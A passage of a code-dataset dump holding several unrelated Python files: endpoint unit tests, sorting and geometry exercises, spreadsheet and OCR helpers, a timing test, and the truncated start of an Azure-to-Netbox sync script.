+{"seq_id":"158564459","text":"import unittest\n\nimport endpoints\nimport pytest\nimport mock\nimport requests\n\nfrom endpoints import message_types\n\nimport main\n\n\nclass TestEndpoints(TestCase):\n \"\"\"\n Test to makes sure that all endpoints exists. Note that\n these tests does not are testing the response output.\n \"\"\"\n\n def setUp(self):\n self.url = '/_ah/api/echo/v1'\n\n @patch('requests.post')\n def test_post_endpoint(self, mock_post):\n url_method_post = '{}/create'.format(self.url)\n info = {'color': 'Yellow', 'brakes': 'Disco'}\n resp = requests.post(url_method_post, data=json.dumps(info), headers={'Content-Type': 'application/json'})\n\n mock_post.assert_called_with(url_method_post, data=json.dumps(info), headers={'Content-Type': 'application/json'})\n self.assertEqual(resp.status_code, 200)\n\n @patch('requests.get')\n def test_get_endpoint(self, mock_get):\n url_method_get = '{}/consult?color=Red'.format(self.url)\n resp = requests.get(url_method_get, headers={'Content-Type': 'application/json'})\n\n mock_get.assert_called_with(url_method_get, headers={'Content-Type': 'application/json'})\n self.assertEqual(resp.status_code, 200)\n\n @path('requets.put')\n def test_put_endpoint(self, mock_put):\n url_method_put = '{}/update/123'.format(self.url)\n info = {'color': 'Red'}\n resp = requests.put(url_method_put, data=json.dumps(info), headers={'Content-Type': 'application/json'})\n\n mock_put.assert_called_with(url_method_put, data=json.dumps(info), headers={'Content-Type': 'application/json'})\n self.assertEqual(resp.status_code, 200)\n\n @patch('requests.delete')\n def test_delete_endpoint(self, mock_delete):\n url_method_delete = '{}/delete/123'.format(self.url)\n resp = requests.delete(url_method_delete, headers={'Content-Type': 'application/json'})\n\n mock_delete.assert_called_with(url_method_delete, headers={'Content-Type': 'application/json'})\n self.assertEqual(resp.status_code, 200)\n\n\ndef test_echo():\n api = main.EchoApi()\n request = main.EchoApi.echo.remote.request_type(content='Hello world!')\n response = api.echo(request)\n assert 'Hello world!' == response.content","sub_path":"main_test.py","file_name":"main_test.py","file_ext":"py","file_size_in_byte":2226,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"590199332","text":"import re\ndef baseConvertTo16(n,x):\n prep=int(n,x) #==1302\n convert=hex(prep)\\\n #return convert\n #how do we calculate the reverse:\n #1302 ->'ca'\n regexer=r\"[a-b0-9]+[x]\"\n cut=re.sub(regexer,\"\",convert)\n print(cut)\n\nbaseConvertTo16('z',36)","sub_path":"DI_IoC_Prac/CodeSignalPy/CodeSignalPy.py","file_name":"CodeSignalPy.py","file_ext":"py","file_size_in_byte":262,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"114351372","text":"'''\nGiven three sorted arrays A, B and C of size N, M and P respectively. \nThe task is to merge them into a single array which must be sorted in increasing order.\n\nInput:\nFirst line of input contains number of testcases T. For each testcase, first line of input contains size of three arrays N, M and P. \nNext three lines contains N, M and P elements for arrays.\n\nOutput:\nOutput the merged sorted array.\n\nYour Task:\nThis is a function problem. You only need to complete the function mergeThree() that takes A,B,C as parameters. \nThe function returns an array or vector.\n\nConstraints:\n1 <= T <= 100\n1 <= N, M, P <= 106\n1 <= A[i], B[i], C[i] <= 106\n\nExample:\nInput:\n2\n4 5 6\n1 2 3 4\n1 2 3 4 5\n1 2 3 4 5 6\n2 3 4\n1 2\n2 3 4\n4 5 6 7\nOutput:\n1 1 1 2 2 2 3 3 3 4 4 4 5 5 6\n1 2 2 3 4 4 5 6 7\n\nExplanation:\nTestcase 1: Merging these three sorted arrays, we have elements as 1 1 1 2 2 2 3 3 3 4 4 4 5 5 6.\nTestcase 2: Merging three sorted arrays , we have elements as 1 2 2 3 4 4 5 6 7.\n\nhints:\n\n1)\nTry solving it with same method as Merge 2 sorted arrays (Extra space allowed solution).\nThe difference is instead of 2, 3 arrays are available.\nWhat all changes should occur due to this...??\n\n2)\nThe complete solution:\n\nMake an output array to store the complete result of merging 3 sorted arrays.\nIterate through all the 3 arrays at once, using different iterators for each array, and storing the minimum of all in the output array.\nAfter this loop exits, this shows one loop has exhausted. And 2 arrays are still left. Make cases accordingly.\nTotal 3 cases will be made, i.e if A exhausts, iterate for B & C, and if B exhausts iterate for A & C, and so on.\nAfter this loop also exits, a single array is still left. Make the cases for the same accordingly. And output the the remaining array.\n\n'''\ndef mergeThree(A,B,C):\n \n m, n, o = len(A), len(B), len(C)\n i = j = k = 0\n \n # Destination array \n d = []\n \n while(i < m and j < n and k < o):\n \n # Get Minimum element\n mini = min(A[i], B[j], C[k])\n \n d.append(mini)\n \n # Increment the source pointer which gives minimum element\n if(A[i] == mini):\n i += 1\n elif(B[j] == mini):\n j += 1\n elif(C[k] == mini):\n k += 1\n \n # Merge a and b if c has exhausted \n while(i < m and j < n):\n if(A[i] <= B[j]):\n d.append(A[i])\n i += 1\n else:\n d.append(B[j])\n j += 1\n \n # Merge b and c if a has exhausted \n while(j < n and k < o): \n if(B[j] <= C[k]):\n d.append(B[j]) \n j += 1\n else: \n d.append(C[k]) \n k += 1\n \n # Merge a and c if b has exhausted \n while(i < m and k < o): \n if(A[i] <= C[k]): \n d.append(A[i]) \n i += 1\n else: \n d.append(C[k]) \n k += 1\n \n #Take elements from a if b and c have exhausted \n while(i < m): \n d.append(A[i]) \n i += 1\n\n # Take elements from b if a and c have exhausted \n while(j < n): \n d.append(B[j]) \n j += 1\n\n # Take elements from c if a and b have exhausted \n while(k < o):\n d.append(C[k]) \n k += 1\n \n return d\n \nA = [1, 2, 41, 52, 84] \nB = [1, 2, 41, 52, 67] \nC = [1, 2, 41, 52, 67, 85]\n\nprint(mergeThree(A, B, C)) ","sub_path":"geeksforgeeks/sorting/17_merge_three_sorted_arrays.py","file_name":"17_merge_three_sorted_arrays.py","file_ext":"py","file_size_in_byte":3408,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"300000506","text":"import openpyxl\r\n\r\nwb=openpyxl.load_workbook(\"2018Budgets.xlsx\")\r\nfor item in wb.get_sheet_names():\r\n print (item)\r\n\r\nsheet = wb.get_sheet_by_name('Table 1')\r\ncellRange = sheet ['A1':'P1']\r\nfor cell in cellRange:\r\n print(cell.coordinate, cell.value)\r\n print(\"END\")\r\n \r\n\r\n\r\n\r\n","sub_path":"pyXLSX.py","file_name":"pyXLSX.py","file_ext":"py","file_size_in_byte":291,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"454109918","text":"import sys\r\nimport math\r\nimport numpy as np\r\nimport math\r\nfrom matplotlib import pyplot as plt\r\n\r\n\r\ndef getVertices(filename):\r\n vertices = []\r\n with open(filename) as file:\r\n for data in file:\r\n if data.__contains__(\" \"):\r\n data = data.split(\" \")\r\n vertices.append([int(data[0].strip()), int(data[1].strip())])\r\n\r\n return vertices\r\n\r\n\r\ndef main(vertices):\r\n coordForTriang = sorted(vertices[:len(vertices) - 1], key=lambda x: x[0])\r\n triangulatedGroups = []\r\n for index in range(len(coordForTriang) - 2):\r\n triangulatedGroups.append(coordForTriang[index:index + 3])\r\n\r\n L = []\r\n P1 = []\r\n P2 = [x for x in vertices]\r\n Per1 = 0\r\n Per2 = calculatePerimeter(vertices)\r\n\r\n for territory in range(len(triangulatedGroups)):\r\n region1Area = calculateArea(P1) + calculateArea(triangulatedGroups[territory])\r\n region2Area = calculateArea(P2) - calculateArea(triangulatedGroups[territory])\r\n\r\n if region1Area > region2Area:\r\n p = triangulatedGroups[territory][1]\r\n r = triangulatedGroups[territory][0]\r\n s = triangulatedGroups[territory][2]\r\n D1 = region1Area - region2Area\r\n tempQ = (D1 / (2 * calculateArea(triangulatedGroups[territory])))\r\n tempQ = [tempQ * (r[0] - s[0]), tempQ * (r[1] - s[1])]\r\n q = [tempQ[0] + s[0], tempQ[1] + s[1]]\r\n L = [p, q, s, r]\r\n return [L, P1, P2, Per1, Per2]\r\n P1 = addTerritory(P1, triangulatedGroups[territory])\r\n P2 = removeTerritory(P2, triangulatedGroups[territory])\r\n if territory == 0:\r\n Per1 = Per1 + distance(triangulatedGroups[territory][1], triangulatedGroups[territory][2]) \\\r\n + distance(triangulatedGroups[territory][1], triangulatedGroups[territory][0])\r\n Per2 = Per2 - distance(triangulatedGroups[territory][1], triangulatedGroups[territory][2]) \\\r\n - distance(triangulatedGroups[territory][1], triangulatedGroups[territory][0])\r\n else:\r\n Per1 = Per1 + distance(triangulatedGroups[territory][1], triangulatedGroups[territory][2])\r\n Per2 = Per2 - distance(triangulatedGroups[territory][1], triangulatedGroups[territory][2])\r\n return None\r\n\r\n\r\ndef addTerritory(P=[], T=[]):\r\n if len(P) == 0:\r\n P = T\r\n else:\r\n P.pop()\r\n P.insert(P.index(T[1]), T[2])\r\n P.append(P[0])\r\n return P\r\n\r\n\r\ndef removeTerritory(P=[], T=[]):\r\n if len(P) > 3:\r\n P.remove(T[0])\r\n P[len(P) - 1] = P[0]\r\n return P\r\n else:\r\n return []\r\n\r\n\r\ndef calculateArea(P=[]):\r\n if len(P) < 2:\r\n return 0\r\n area = 0\r\n for i in range(len(P) - 1):\r\n point1 = P[i]\r\n point2 = P[i + 1]\r\n areaCal = (point2[0] - point1[0]) * (point2[1] + point1[1]) / 2\r\n area -= areaCal\r\n point1 = P[-1]\r\n point2 = P[0]\r\n areaCal = (point2[0] - point1[0]) * (point2[1] + point1[1]) / 2\r\n area -= areaCal\r\n return abs(area)\r\n\r\n\r\ndef calculatePerimeter(coorList=[]):\r\n perimeter = 0\r\n for i in range(len(coorList) - 1):\r\n point1 = coorList[i]\r\n point2 = coorList[i + 1]\r\n perimeter += distance(point1, point2)\r\n perimeter += distance(coorList[len(coorList) - 1], coorList[0])\r\n return perimeter\r\n\r\n\r\ndef distance(point1=[], point2=[]):\r\n return math.sqrt(math.pow(point2[1] - point1[1], 2) + math.pow(point2[0] - point1[0], 2))\r\n\r\n\r\n\"\"\"\r\n************************************************************************************\r\n\"\"\"\r\n\r\n\r\nclass AB:\r\n __slots__ = 'p', 'q', 'r', 's'\r\n\r\n def __init__(self, p, q, r, s):\r\n self.p = p\r\n self.q = q\r\n self.r = r\r\n self.s = s\r\n\r\n\r\ndef area_polygon(vertices):\r\n result = 0\r\n for i in range(len(vertices)):\r\n current_vertex = vertices[i]\r\n next_vertex = vertices[(i + 1) % len(vertices)]\r\n\r\n result += ((next_vertex[0] - current_vertex[0]) * (current_vertex[1] + next_vertex[1])) / 2\r\n\r\n return abs(result)\r\n\r\n\r\ndef perimeter_polygon(vertices):\r\n result = 0\r\n for i in range(len(vertices)):\r\n current_vertex = vertices[i]\r\n next_vertex = vertices[(i + 1) % len(vertices)]\r\n\r\n result += segment_length(current_vertex, next_vertex)\r\n\r\n return result\r\n\r\n\r\ndef segment_length(vertex1, vertex2):\r\n return math.sqrt((vertex2[0] - vertex1[0]) ** 2 + (vertex2[1] - vertex1[1]) ** 2)\r\n\r\n\r\ndef cross_product(vector1, vector2):\r\n return (vector1[0] * vector2[1]) - (vector1[1] * vector2[0])\r\n\r\n\r\ndef sin_vertices(vertice1, vertice2, vertice3):\r\n length1 = segment_length(vertice1, vertice2)\r\n length2 = segment_length(vertice3, vertice2)\r\n\r\n crossproduct = cross_product([vertice1[0] - vertice2[0], vertice1[1] - vertice2[1]],\r\n [vertice3[0] - vertice2[0], vertice3[1] - vertice2[1]])\r\n return crossproduct / (length1 * length2)\r\n\r\n\r\ndef intersection(segment1, segment2):\r\n a1 = (segment1[1][1] - segment1[0][1]) / (segment1[1][0] - segment1[0][0])\r\n a2 = (segment2[1][1] - segment2[0][1]) / (segment2[1][0] - segment2[0][0])\r\n\r\n b1 = (a1 * segment1[0][0]) - segment1[0][1]\r\n b2 = (a2 * segment2[0][0]) - segment2[0][1]\r\n\r\n x = (b2 - b1) / (a2 - a1)\r\n y = (a1 * x) - b1\r\n\r\n return [x, y]\r\n\r\n\r\ndef update(vertices, area_bisector, set_bisectors):\r\n p = area_bisector.p\r\n q = area_bisector.q\r\n r = area_bisector.r\r\n s = area_bisector.s\r\n\r\n p_index = vertices.index(p)\r\n p1 = vertices[(p_index - 1) % len(vertices)]\r\n p2 = vertices[(p_index + 1) % len(vertices)]\r\n\r\n o1 = intersection([p, q], [s, p1]) # pq intersection sp1\r\n o2 = intersection([p, q], [r, p2]) # pq intersection rp2\r\n\r\n p1_prime = None\r\n p2_prime = None\r\n q1_prime = None\r\n q2_prime = None\r\n\r\n L1 = None\r\n L2 = None\r\n L3 = None\r\n L4 = None\r\n if area_polygon([q, r, o2]) <= area_polygon([p, p2, o2]): # pq\r\n num = ((area_polygon([p, p2, o2]) - area_polygon([q, r, o2])) /\r\n cross_product([r[0] - p2[0], r[1] - p2[1]], [p[0] - p2[0], p[1] - p2[1]]))\r\n\r\n vector = [p[0] - p2[0], p[1] - p2[1]]\r\n offset_vector = [num * element for element in vector]\r\n\r\n p1_prime = [p2[0] + offset_vector[0], p2[1] + offset_vector[1]]\r\n L1 = AB(r, p1_prime, p2, p)\r\n # L1 = [r, p1_prime]\r\n if area_polygon([q, s, o1]) <= area_polygon([p, p1, o1]):\r\n num = ((area_polygon([p, p1, o1]) - area_polygon([q, s, o1])) /\r\n cross_product([p[0] - p1[0], p[1] - p1[1]], [s[0] - p1[0], s[1] - p1[1]]))\r\n\r\n vector = [p[0] - p1[0], p[1] - p1[1]]\r\n offset_vector = [num * element for element in vector]\r\n\r\n p2_prime = [p1[0] + offset_vector[0], p1[1] + offset_vector[1]]\r\n L2 = AB(s, p2_prime, p, p1)\r\n # L2 = [s, p2_prime]\r\n if area_polygon([q, s, o1]) >= area_polygon([p, p1, o1]):\r\n sq = segment_length(s, q)\r\n sp1 = segment_length(s, p1)\r\n sin_rsp1 = sin_vertices(r, s, p1)\r\n num = (area_polygon([q, s, o1]) - (area_polygon([p, p1, o1])) / sq * sp1 * sin_rsp1)\r\n\r\n vector = [q[0] - s[0], q[1] - s[1]]\r\n offset_vector = [num * element for element in vector]\r\n\r\n q1_prime = [s[0] + offset_vector[0], s[1] + offset_vector[1]]\r\n L3 = AB(p1, q1_prime, r, s)\r\n # L3 = [p1, q1_prime]\r\n if area_polygon([q, r, o2]) >= area_polygon([p, p2, o2]):\r\n rq = segment_length(r, q)\r\n rp2 = segment_length(r, p2)\r\n sin_srp2 = sin_vertices(s, r, p2)\r\n\r\n num = (area_polygon([q, r, o2]) - (area_polygon([p, p2, o2])) / rq * rp2 * sin_srp2)\r\n\r\n vector = [q[0] - r[0], q[1] - r[1]]\r\n offset_vector = [num * element for element in vector]\r\n\r\n q2_prime = [r[0] + offset_vector[0], r[1] + offset_vector[1]]\r\n L4 = AB(p2, q2_prime, r, s)\r\n # L4 = [p2, q2_prime]\r\n\r\n L1_prime = None\r\n L2_prime = None\r\n\r\n if L1 is not None:\r\n L1_prime = L1\r\n else:\r\n L1_prime = L4\r\n\r\n if L2 is not None:\r\n L2_prime = L2\r\n else:\r\n L2_prime = L3\r\n\r\n # if p1_prime is None:\r\n # p1_prime = q2_prime # q1_prime in paper\r\n # r = p2\r\n # if p2_prime is None:\r\n # p2_prime = q1_prime # q2_prime in paper\r\n # s = p1\r\n\r\n a = None\r\n b = None\r\n\r\n P1 = [q]\r\n P2 = []\r\n for i in range(0, (vertices.index(p) - vertices.index(r) + 1 + len(vertices)) % len(vertices)):\r\n P1.append(vertices[(vertices.index(r) + i) % len(vertices)])\r\n for i in range(0, (vertices.index(s) - vertices.index(p) + 1 + len(vertices)) % len(vertices)):\r\n P2.append(vertices[(vertices.index(p) + i) % len(vertices)])\r\n P2.append(q)\r\n\r\n P11 = [L1_prime.q]\r\n P12 = []\r\n for i in range(0, (vertices.index(L1_prime.p) - vertices.index(L1_prime.r) + 1 + len(vertices)) % len(vertices)):\r\n P11.append(vertices[(vertices.index(L1_prime.r) + i) % len(vertices)])\r\n for i in range(0, (vertices.index(L1_prime.s) - vertices.index(L1_prime.p) + 1 + len(vertices)) % len(vertices)):\r\n P12.append(vertices[(vertices.index(L1_prime.p) + i) % len(vertices)])\r\n P12.append(L1_prime.q)\r\n\r\n P21 = [L2_prime.q]\r\n P22 = []\r\n for i in range(0, (vertices.index(L2_prime.p) - vertices.index(L2_prime.r) + 1 + len(vertices)) % len(vertices)):\r\n P21.append(vertices[(vertices.index(L2_prime.r) + i) % len(vertices)])\r\n for i in range(0, (vertices.index(L2_prime.s) - vertices.index(L2_prime.p) + 1 + len(vertices)) % len(vertices)):\r\n P22.append(vertices[(vertices.index(L2_prime.p) + i) % len(vertices)])\r\n P22.append(L2_prime.q)\r\n\r\n return [P11, P12, P21, P22]\r\n\r\n\r\n\"\"\"\r\n************************************************************************************\r\n\"\"\"\r\ndef plotPts(P1=[], P2=[]):\r\n x = []\r\n y = []\r\n for p in P1:\r\n x.append(p[0])\r\n y.append(p[1])\r\n plt.fill(x, y, color=\"b\")\r\n plt.plot(x, y)\r\n\r\n x = []\r\n y = []\r\n for p in P2:\r\n x.append(p[0])\r\n y.append(p[1])\r\n plt.fill(x, y, color=\"b\")\r\n plt.plot(x, y)\r\n plt.show()\r\n\r\n\r\nfilename = sys.argv[1]\r\nvertices = getVertices(filename)\r\nresult = main(vertices)\r\nL = result[0]\r\nL = AB(L[0], L[1], L[2], L[3])\r\nvertices.pop()\r\n\r\nP1 = result[1]\r\nP1.insert(P1.index(result[0][0])+1, result[0][1])\r\nP2 = result[2]\r\nP2[0] = result[0][1]\r\nP2[len(P2)-1] = result[0][1]\r\nplotPts(P1, P2)\r\nresultPts = update(vertices, L, [])\r\nresultPts[0].append(resultPts[0][0])\r\nresultPts[1].append(resultPts[1][0])\r\nresultPts[2].append(resultPts[2][0])\r\nresultPts[3].append(resultPts[3][0])\r\nprint(resultPts)\r\nplotPts(resultPts[0], resultPts[1])\r\nplotPts(resultPts[2], resultPts[3])\r\n# for _ in range(len(vertices)):\r\n# L, P1, P2, isDone = update(vertices, L, [])\r\n# print(isDone)\r\n# if isDone:\r\n# break\r\n# print(L.p, ' ', L.q)\r\n# print(P1)\r\n# print(P2)\r\n# print(perimeter_polygon(P1), perimeter_polygon(P2))\r\n# print(calculateArea(P1), calculateArea(P2))\r\n\r\n# Code to calculate exact points\r\n# \tdp = perimeter_polygon(P1) - perimeter_polygon(P2)\r\n# dp1 = perimeter_polygon(P11) - perimeter_polygon(P12)\r\n# dp2 = perimeter_polygon(P21) - perimeter_polygon(P22)\r\n#\r\n# L_prime = None\r\n# P1_prime = None\r\n# P2_prime = None\r\n#\r\n# if dp == 0:\r\n# a = p\r\n# b = q\r\n# L_prime = AB(p, q, r, s)\r\n# P1_prime = P1\r\n# P2_prime = P2\r\n#\r\n# return L_prime, P1_prime, P2_prime, True\r\n# elif dp * dp1 < 0 or dp * dp2 < 0:\r\n# d = None\r\n# c = None\r\n# if dp * dp1 < 0: # dp = dp1 in paper\r\n# d = L1_prime.p\r\n# c = L1_prime.q\r\n# else: # dp = dp2 in paper\r\n# d = L2_prime.p\r\n# c = L2_prime.q\r\n#\r\n# area_dpq = area_polygon([d, p, q])\r\n# area_cpq = area_polygon([c, p, q])\r\n# A = area_dpq - area_cpq\r\n# B = (area_cpq * (dp/2 + segment_length(q, d))) - (area_dpq * (dp/2 + segment_length(p, c)))\r\n# C = - area_cpq * dp * segment_length(q, d)\r\n#\r\n# qb1 = None\r\n# qb2 = None\r\n# qb = None\r\n# if area_dpq == area_cpq:\r\n# qb1 = -C / B\r\n# qb2 = qb1\r\n# qb = -C / B\r\n# else:\r\n# qb1 = (-B + math.sqrt(abs((B ** 2) - (4 * A * C)))) / (2 * A)\r\n# qb2 = (-B - math.sqrt(abs((B ** 2) - (4 * A * C)))) / (2 * A)\r\n# qb = (-B + math.sqrt(abs((B ** 2) - (4 * A * C)))) / (2 * A)\r\n#\r\n# qb = qb1\r\n# b = [q[i] + (d[i] - q[i]) * qb for i in range(len(q))]\r\n# pa = qb - dp/2 # dp/2 in code part of paper\r\n# a = [p[i] + (c[i] - p[i]) * pa for i in range(len(p))]\r\n# O = intersection([a, b], [p, q]) # intersection of ab and pq\r\n#\r\n# if abs(area_polygon([a, O, p]) - area_polygon([b, O, q])) > 0.1:\r\n# qb = qb2\r\n# b = [q[i] + (d[i] - q[i]) * qb for i in range(len(q))]\r\n# pa = qb - dp/2 # dp/2 in code part of paper\r\n# a = [p[i] + (c[i] - p[i]) * pa for i in range(len(p))]\r\n#\r\n# L_prime = AB(a, b, q, d)\r\n# P1_prime = [b] + P1\r\n# P2_prime = [a] + P2\r\n# P1_prime.pop()\r\n# P2_prime.pop()\r\n#\r\n# return L_prime, P1_prime, P2_prime, True\r\n# else:\r\n# if dp1 < dp2:\r\n# L_prime = L1_prime\r\n# P1_prime = P11\r\n# P2_prime = P12\r\n# else:\r\n# L_prime = L2_prime\r\n# P1_prime = P21\r\n# P2_prime = P22\r\n#\r\n# return L_prime, P1_prime, P2_prime, False","sub_path":"FairPartition.py","file_name":"FairPartition.py","file_ext":"py","file_size_in_byte":13597,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"187121868","text":"print(\"\"\"\r\nEscreva o menu de opções abaixo. Leia A opção do usuário e execute A operação escolhida.\r\nEscreva uma mensagem de erro se A opção for inválida.\r\n Escolha A opção:\r\n 1- Soma de 2 números.\r\n 2- Diferença entre números (maior pela menor).\r\n 3- Produto entre 2 números.\r\n 4- Divisão entre 2 números (o denominador não pode ser zero).\r\n\"\"\")\r\n\r\nprint('''\t\r\nEscolha A opção:\r\n1- Soma de 2 números.\r\n2- Diferença entre números (maior pelo menor).\r\n3- Produto entre 2 números.\r\n4- Divisão entre 2 números (o denominador não pode ser zero).\r\n''')\r\nescolha = int(input('Escolha: '))\r\nnum1 = float(input('Um número: '))\r\nnum2 = float(input('Outro número: '))\r\n\r\nif escolha == 1:\r\n resultado = num1 + num2\r\n print(f'{num1} + {num2} = {resultado}')\r\n\r\nelif escolha == 2:\r\n if num1 > num2:\r\n resultado = num1 - num2\r\n print(f'{num1} - {num2} = {resultado}')\r\n\r\n else:\r\n resultado = num2 - num1\r\n print(f'{num2} - {num1} = {resultado}')\r\n\r\nelif escolha == 3:\r\n resultado = num1 * num2\r\n print(f'{num1} * {num2} = {resultado}')\r\n\r\nelif escolha == 4:\r\n if num1 > num2:\r\n if num2 != 0:\r\n resultado = num1 / num2\r\n print(f'{num1} / {num2} = {resultado}')\r\n\r\n else:\r\n if num1 != 0:\r\n resultado = num2 / num1\r\n print(f'{num2} / {num1} = {resultado}')\r\n","sub_path":"Seção_05/Exercício_21.py","file_name":"Exercício_21.py","file_ext":"py","file_size_in_byte":1396,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"91699169","text":"# -*- coding: utf-8 -*-\nimport argparse\nimport os\nimport time\n\nfrom Pdf2Excel.AbbyyOnlineSdk import *\n\nprocessor = AbbyyOnlineSdk()\n\nclass Pdf2Excel(object):\n \"\"\"\n build ABBYY OCR into a Pdf2Excel apckage,\n Environment Demands: argparse, AbbyyOnlineSdk\n \"\"\"\n \n processor = AbbyyOnlineSdk()\n\n def setup_processor(self):\n \tif \"ABBYY_APPID\" in os.environ:\n \t\tprocessor.ApplicationId = os.environ[\"ABBYY_APPID\"]\n\n \tif \"ABBYY_PWD\" in os.environ:\n \t\tprocessor.Password = os.environ[\"ABBYY_PWD\"]\n\n \t# Proxy settings\n \tif \"http_proxy\" in os.environ:\n \t\tproxy_string = os.environ[\"http_proxy\"]\n \t\tprint(\"Using http proxy at {}\".format(proxy_string))\n \t\tprocessor.Proxies[\"http\"] = proxy_string\n\n \tif \"https_proxy\" in os.environ:\n \t\tproxy_string = os.environ[\"https_proxy\"]\n \t\tprint(\"Using https proxy at {}\".format(proxy_string))\n \t\tprocessor.Proxies[\"https\"] = proxy_string\n\n\n # Recognize a file at filePath and save result to resultFilePath\n def recognize_file(self,file_path, result_file_path, language, output_format):\n print(\"Uploading..\")\n settings = ProcessingSettings()\n settings.Language = language\n settings.OutputFormat = output_format\n task = processor.process_image(file_path, settings)\n if task is None:\n print(\"Error\")\n return\n if task.Status == \"NotEnoughCredits\":\n print(\"Not enough credits to process the document. Please add more pages to your application's account.\")\n return\n\n print(\"Id = {}\".format(task.Id))\n print(\"Status = {}\".format(task.Status))\n\n # Wait for the task to be completed\n print(\"Waiting..\")\n # Note: it's recommended that your application waits at least 2 seconds\n # before making the first getTaskStatus request and also between such requests\n # for the same task. Making requests more often will not improve your\n # application performance.\n # Note: if your application queues several files and waits for them\n # it's recommended that you use listFinishedTasks instead (which is described\n # at http://ocrsdk.com/documentation/apireference/listFinishedTasks/).\n\n while task.is_active():\n time.sleep(5)\n print(\".\")\n task = processor.get_task_status(task)\n\n print(\"Status = {}\".format(task.Status))\n\n if task.Status == \"Completed\":\n if task.DownloadUrl is not None:\n processor.download_result(task, result_file_path)\n print(\"Result was written to {}\".format(result_file_path))\n else:\n print(\"Error processing task\")\n\n def create_parser():\n parser = argparse.ArgumentParser(description=\"Recognize a file via web service\")\n parser.add_argument('source_file')\n parser.add_argument('target_file')\n\n parser.add_argument('-l', '--language', default='English', help='Recognition language (default: %(default)s)')\n group = parser.add_mutually_exclusive_group()\n group.add_argument('-txt', action='store_const', const='txt', dest='format', default='txt')\n group.add_argument('-pdf', action='store_const', const='pdfSearchable', dest='format')\n group.add_argument('-rtf', action='store_const', const='rtf', dest='format')\n group.add_argument('-docx', action='store_const', const='docx', dest='format')\n group.add_argument('-xml', action='store_const', const='xml', dest='format')\n\n return parser\n\n #from process import *\n #这一步即可以,相当于加载上述函数,上面函数本来就是从process.py摘抄出来一步步run的\n def __init__(self,result=\"myworkbook.xlsx\",Language=\"English\",typefile=\"xlsx\"):\n \"\"\"\n Language input can be found here:https://ocrsdk.com/documentation/specifications/recognition-languages/ \n typefile input can be found here:https://ocrsdk.com/documentation/specifications/export-formats/ \n \"\"\"\n self.setup_processor()\n \n path=input(\"Your Pdf file path: like'C:/data/1.pdf'\")\n start=time.time()\n self.recognize_file(path, result, Language, typefile)#能识别中文简体ChinesePRC繁体ChineseTaiwan;中英文混合的怎么设置????\n #https://ocrsdk.com/documentation/specifications/recognition-languages/ 语言列表\n #https://ocrsdk.com/documentation/specifications/export-formats/ 输出格式列表\n T1=time.time()-start\n print('Total time spend %d seconds for 22 page pdf'%T1)\n #About 5 seconds per page\n #22 pages 都在一个sheet里,差评\n \nif __name__ == '__main__':\n main()\n","sub_path":"Pdf2Excel/Pdf2Excel.py","file_name":"Pdf2Excel.py","file_ext":"py","file_size_in_byte":4729,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"474286993","text":"import numpy as np\r\n\r\nclass coil(object):\r\n def __init__(self):\r\n self.r = 23.72\r\n self.t = 1.94\r\n self.xo,self.yo = +111.46/2,0 # 0,2381.5\r\n self.yc = np.array([8.87,65.1,120.83,175.07,229.3,283.54,\r\n 337.77,392,446.24,500.47,554.71])+self.r\r\n self.xc= np.array([3.4,65.61,119.84,182.05,236.29,298.49,352.73])+self.r\r\n Ncol = [3,9,11,11,11,11,11]\r\n \r\n self.x,self.y = [],[]\r\n direction = 1\r\n for i,n in enumerate(Ncol):\r\n y_slice = self.yc[-n:]\r\n if direction is -1:\r\n y_slice = y_slice[::-1]\r\n for j in range(n):\r\n self.x.append(self.xc[-(1+i)])\r\n self.y.append(y_slice[j])\r\n direction *= -1\r\n \r\n self.xc = np.append(-self.xc[::-1], self.xc) + self.xo\r\n self.yc += self.yo\r\n self.x = np.append(self.x,-1*np.ones(len(self.x))*self.x[::-1])+self.xo\r\n self.y = np.append(self.y,self.y[::-1])+self.yo\r\n ","sub_path":"etna/geom.py","file_name":"geom.py","file_ext":"py","file_size_in_byte":1019,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"433613297","text":"import timeit\nfrom numpy import random\n\n\nN = 5\nd = 3\nC = 5\n\nW = random.rand(C,d)\n\nresult = random.rand(d,1)\n\nwordvectors_list = [random.rand(d,1) for i in range(N)]\nprint(wordvectors_list)\nstart = timeit.timeit()\n[W.dot(wordvectors_list[i]) for i in range(N)]\nend = timeit.timeit()\nprint(end-start)\n\nwordvectors_one_matrix = random.rand(d,N)\nprint(wordvectors_one_matrix)\nstart = timeit.timeit()\nW.dot(wordvectors_one_matrix)\nend = timeit.timeit()\nprint(end-start)\n\n","sub_path":"work/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":466,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"530746805","text":"#!/usr/bin/env python3\n\"\"\"Collects Azure resources and syncs them to Netbox via Python3\"\"\"\n\nfrom datetime import date, datetime\nfrom ipaddress import ip_network\nimport argparse\nimport requests\nfrom azure.common.credentials import ServicePrincipalCredentials\nfrom azure.mgmt.network import NetworkManagementClient\nfrom azure.mgmt.resource import SubscriptionClient\nfrom azure.mgmt.compute import ComputeManagementClient\nfrom msrestazure import azure_exceptions\nimport settings\nfrom logger import log\n\n\ndef main():\n \"\"\"Main function to run if script is called directly\"\"\"\n parser = argparse.ArgumentParser()\n parser.add_argument(\n \"-c\", \"--cleanup\", action=\"store_true\",\n help=\"Remove all Azure synced objects which support tagging. This is \"\n \"helpful if you want to start fresh or stop using this script.\"\n )\n parser.add_argument(\n \"-v\", \"--verbose\", action=\"store_true\",\n help=\"Enable verbose output. This overrides the log level in the \"\n \"settings file. Intended for debugging purposes only.\"\n )\n args = parser.parse_args()\n nb = NetBoxHandler()\n if args.verbose:\n log.setLevel(\"DEBUG\")\n log.debug(\"Log level has been overriden by the --verbose argument.\")\n if args.cleanup:\n start_time = datetime.now()\n nb.remove_all()\n log.info(\n \"Completed removal of Azure 